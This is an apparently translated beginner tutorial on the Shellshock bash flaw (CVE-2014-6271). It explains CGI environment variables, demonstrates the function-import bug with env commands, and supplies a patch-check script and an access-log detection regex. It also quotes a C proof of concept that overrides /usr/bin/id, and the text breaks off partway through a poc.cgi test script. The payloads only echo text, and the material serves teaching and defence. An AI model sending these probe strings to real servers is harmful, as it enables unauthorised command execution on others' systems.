Bash environment variable parsing vulnerability for beginners

Source: Internet
Author: User
1. What are environment variables?

Programs on both Windows and Linux support environment variables. Environment variables are stored as strings, usually at the beginning of the process's memory space. When you execute a program, you can specify environment variables to pass information to it. On Windows, which is dominated by GUI applications, users seldom need environment variables to pass information to programs. Environment variables are a resource of the process space and cannot be shared between processes directly; however, through the process resource inheritance mechanism, the environment variables of the parent process are copied to the child process. For example, environment variables set in a bash process are automatically copied to the subprocesses that bash starts.

Different programs rely on environment variables to different degrees. Many small programs can ignore them entirely, while others depend on them heavily, such as CGI programs for web applications: all form data is passed from the web server process to the CGI program in the form of environment variables. Below is a simple CGI program written in C.

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *data;
    long m, n;

    printf("%s%c%c\n", "Content-Type: text/html; charset=gb2312", 13, 10);
    printf("<title>Multiplication result</title>\n");
    printf("<h3>Multiplication result</h3>\n");
    /* The form data of the GET request arrives in the environment variable QUERY_STRING */
    data = getenv("QUERY_STRING");
    if (data == NULL)
        printf("<p>Error: no data was submitted or the transfer failed.");
    else if (sscanf(data, "m=%ld&n=%ld", &m, &n) != 2)
        printf("<p>Error: invalid input; the form fields must be numbers.");
    else
        printf("<p>The product of %ld and %ld is %ld.", m, n, m * n);
    return 0;
}

It can be seen that the GET request string sent by the client is passed to this program through the environment variable QUERY_STRING.

Bash is also a heavy user of environment variables, and a CGI program written in bash naturally depends on them even more. The following is a CGI program written in bash.

#!/bin/bash
# Minimal CGI: send the header, a blank line, then echo the query string back
echo 'Content-type: text/html'
echo ''
echo "$QUERY_STRING"

Here too the environment variable QUERY_STRING is used.

2. Bash Vulnerability Analysis of Environment Variables

As mentioned above, environment variables are special strings, and the program that receives them must parse and process them. String processing is a very important task in most programs, and even more so in web programs (HTML, XML and JSON content is itself a string).

Bash is no exception: it must parse the environment variable strings, interpret their meaning and act on them. Since a bash script is itself a text string, the bash engine can simply convert the environment variable string into script syntax, merge it with the bash script to be executed, and then interpret and execute the merged script.

For example, the following script:

echo The value of environment variable X is $X

If the environment variable is X=100, the merged script is equivalent to:

X=100
echo The value of environment variable X is $X

We can use the env tool to test this effect; env runs a program with the environment variables specified on its command line.

[root@localhost ~]# env X=100 bash -c 'echo environment variable X: $X'
environment variable X: 100

Now construct an environment variable with a specially formed value:

[root@localhost ~]# env X='() { echo I am an environment variable; }; ' bash -c 'env'
HOSTNAME=localhost.localdomain
... (irrelevant environment variables omitted)
SSH_CONNECTION=172.16.35.220 60128 172.16.35.135 22
LESSOPEN=|/usr/bin/lesspipe.sh %s
G_BROKEN_FILENAMES=1
X=() {  echo I am an environment variable
}

At this point the environment variable X is still only a string, but bash interprets it as a function rather than as a string value, so the function can be executed directly:

[root@localhost ~]# env X='() { echo I am an environment variable; }; ' bash -c 'X'
I am an environment variable

In this case bash interprets the environment variable and converts it into the following script:

X () { echo I am an environment variable; };

instead of copying it as the assignment:

X='() { echo I am an environment variable; };'

It can be seen that bash interprets environment variable values differently depending on the format of the string.

Now make the value of X more complex, as shown below:

[root@localhost ~]# env X='() { echo I am an environment variable; }; echo you got hit' bash -c 'env'
you got hit
HOSTNAME=localhost.localdomain
SHELL=/bin/bash
SSH_CONNECTION=172.16.35.220 60128 172.16.35.135 22
LESSOPEN=|/usr/bin/lesspipe.sh %s
G_BROKEN_FILENAMES=1
X=() {  echo I am an environment variable
}
_=/bin/env

Here the problem occurs. In this case the value of environment variable X that env passes to bash is:

() { echo I am an environment variable; }; echo you got hit

Bash interprets the first half as the body of function X, but does nothing special with the second half: it is converted into the script as it is. The resulting script is:

X () { echo I am an environment variable; }; echo you got hit

Merged with the command that was asked for, the script becomes:

X () { echo I am an environment variable; }; echo you got hit
env

In this way the echo is executed directly. The echo can of course be replaced by any other command, so bash can be made to execute arbitrary commands. This is the basic principle of this bash vulnerability.

Let's look at the effect after patching.

[root@localhost ~]# env X='() { echo I am an environment variable; }; echo you got hit' bash -c 'env'
HOSTNAME=localhost.localdomain
SHELL=/bin/bash
X=() { echo I am an environment variable; }; echo you got hit
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
_=/bin/env
[root@localhost ~]# env X='() { echo I am an environment variable; }; echo you got hit' bash -c 'echo $X'
() { echo I am an environment variable; }; echo you got hit

It can be seen that bash no longer interprets X as a function: the whole environment variable value is assigned to X as a plain string.
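As an added example (not code from the original post), the following POSIX shell functions turn the experiments above into a repeatable check: one runs the trailing-command probe against a given bash binary and reports whether the trailing command was executed, one shows that a patched bash keeps such a value as a plain string, and one shows the BASH_FUNC_ naming a patched bash now uses when a function is genuinely exported with export -f. The variable name PROBE and the marker text are my own choices.

```shell
#!/bin/sh
# Added example, not code from the original post. Probes whether a bash binary
# still executes the trailing command of a function-style environment value.
# Exit status: 0 = patched (trailing command ignored), 1 = vulnerable,
#              2 = the bash binary could not be found.
shellshock_check() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || return 2
    # Harmless probe: an empty function body followed by a trailing echo.
    # A vulnerable bash runs that echo while importing its environment.
    out=$(env PROBE='() { :; }; echo TRAILING_CODE_RAN' \
              "$bash_bin" -c 'echo probe done' 2>/dev/null)
    case "$out" in
        *TRAILING_CODE_RAN*) return 1 ;;
        *)                   return 0 ;;
    esac
}

# Prints how the child bash sees PROBE: a patched bash keeps the whole value
# as an ordinary string variable instead of parsing it as a function.
probe_as_seen_by_bash() {
    bash_bin="${1:-bash}"
    env PROBE='() { :; }; echo TRAILING_CODE_RAN' "$bash_bin" -c 'printf %s "$PROBE"'
}

# Prints the environment variable name a patched bash uses for a function
# exported with "export -f". The BASH_FUNC_ prefix means a plain variable such
# as PROBE can no longer be mistaken for an exported function.
exported_function_env_name() {
    bash_bin="${1:-bash}"
    "$bash_bin" -c 'f() { :; }; export -f f; env' 2>/dev/null \
        | grep '^BASH_FUNC_f' | cut -d= -f1
}

if shellshock_check bash; then
    echo "bash is patched; PROBE is seen as: $(probe_as_seen_by_bash)"
    echo "exported functions appear as: $(exported_function_env_name)"
else
    echo "check returned $? (1 = vulnerable, 2 = bash not found)"
fi
```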

3. Who will be affected by the bash vulnerability?

From the analysis above, any program that can pass environment variables to bash by some means is affected. The most typical case is a CGI program written in bash: the client only has to put a value such as () { echo I am an environment variable; }; echo you got hit into a form value of the request string, and an attacker can easily attack the server running the CGI.

At present most ordinary websites seldom use CGI, so the problem there is not too large. However, many network devices, such as routers and switches, use CGI programs written in Perl or other languages, and as long as bash is called at the underlying layer there is a great risk.
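As an added example (not from the original post), the following POSIX shell functions scan an Apache combined-format access log for the () { marker that Shellshock probes carry in the User-Agent, Referer or request line, count the matching lines and list the source addresses. The log lines are constructed here with RFC 5737 documentation addresses; the CGI paths and user agents are made up for the sample.

```shell
#!/bin/sh
# Added example, not from the original post. Detection of Shellshock probes in
# an Apache combined-format access log, where the User-Agent and Referer that
# a probe abuses are logged.

# Constructed sample log (documentation addresses, made-up paths and agents).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /cgi-bin/poc.cgi HTTP/1.1" 200 37 "-" "() { :; }; echo vulnerable"
203.0.113.5 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.0" 404 201 "() {  :;}; /bin/true" "curl/7.35.0"
192.0.2.10 - - [25/Sep/2014:10:00:04 +0000] "GET /cgi-bin/poc.cgi?m=2&n=3 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
EOF
}

# Basic regular expression for the prefix bash looked for: "()" followed by
# optional blanks and "{". In a BRE "()" and "{" are literal characters; with
# grep -E "()" would be an empty group and match every line.
PROBE_RE='()[[:space:]]*{'

# Prints the number of log lines carrying the marker (0 when there are none).
count_shellshock_probes() {
    grep -c -- "$PROBE_RE" "$1" || true
}

# Prints "source-ip hits" for every client that sent the marker, sorted.
# Bracket expressions keep the parentheses and brace literal in awk's ERE.
shellshock_sources() {
    awk '/[(][)][[:space:]]*[{]/ { hits[$1]++ }
         END { for (ip in hits) print ip, hits[ip] }' "$1" | sort
}

log=$(mktemp)
sample_log > "$log"
echo "probe lines: $(count_shellshock_probes "$log")"
shellshock_sources "$log"
rm -f "$log"
```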

Patches for this vulnerability have been released; please apply them as soon as possible. Unfortunately, the first patch is incomplete and a further issue remains after it is installed. For details, refer to the following reprinted article: https://raw.githubusercontent.com/citypw/DNFWAH/master/4/d4_0x07_DNFWAH_shellshock_bash_story_cve-2014-6271.txt

$ uname -a
Linux Shawn-fortress 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux

[#4 file 0x07] Bash shellshock event: CVE-2014-6271 data summary
by Shawn the r0ck, Sep 25 2014

Contents
0. What is bash
1. CVE-2014-6271
2. Incomplete patch and story
To be continued...

0. What is bash

The Bourne Again Shell (bash), the most popular shell implementation on GNU/Linux, was born in 1980. After decades of evolution, a simple terminal command line interpreter has grown into a multi-functional interface deeply integrated with the GNU system.

1. CVE-2014-6271

In mid-September 2014 the French GNU/Linux enthusiast Stéphane Chazelas found a vulnerability in the famous shell implementation bash: by constructing the value of an environment variable, you can make bash execute script code of your choosing. According to reports, the vulnerability affects many applications running on GNU/Linux that interact with bash, including:

** In the sshd configuration, ForceCommand is used to restrict the commands remote users may execute; this vulnerability bypasses the restriction and allows arbitrary commands. Restricted shell deployments for git and subversion show the same situation. Normal use of OpenSSH is not affected.
** Apache servers using mod_cgi or mod_cgid are affected if the CGI script is written in bash or runs in a sub-shell. Sub-shells are started by system/popen in C, os.system/os.popen in Python, system/exec in PHP (CGI mode) and open/system in Perl.
** PHP scripts executed in mod_php are not affected.
** DHCP clients call shell scripts and pass them environment variable values received from a remote, possibly malicious, server, so the vulnerability can be exploited through them.
** Daemons and SUID programs that execute shell scripts in an environment where environment variables are set may also be affected.
** Any other program that executes shell scripts using bash as the interpreter may be affected. Shell scripts that do not export variables are not affected.

Let's look at a simple PoC:

1. Test whether the vulnerability exists in the local shell environment:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the vulnerability exists, "vulnerable" is printed.

2. C program:

/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */
#include <unistd.h>
#include <stdio.h>

int main()
{
    char *envp[] = {
        "PATH=/bin:/usr/bin",
        "/usr/bin/id=() { "
        "echo pwn me twice, shame on me; }; "
        "echo pwn me once, shame on you",
        NULL
    };
    char *argv[] = { "/bin/bash", NULL };
    execve(argv[0], argv, envp);
    perror("execve");
    return 1;
}

$ gcc -o bash-is-fun bash-is-fun.c
$ ./bash-is-fun
pwn me once, shame on you
$ /usr/bin/id
pwn me twice, shame on me

In this PoC we can see that bash does not process the trailing part of the value. We will see why from the patch later.

3. Test the HTTP environment (from invisiblethreat): create a script named poc.cgi:

#!/bin/bash
echo "Content-Type: text/html"
echo ""
echo '<html>'
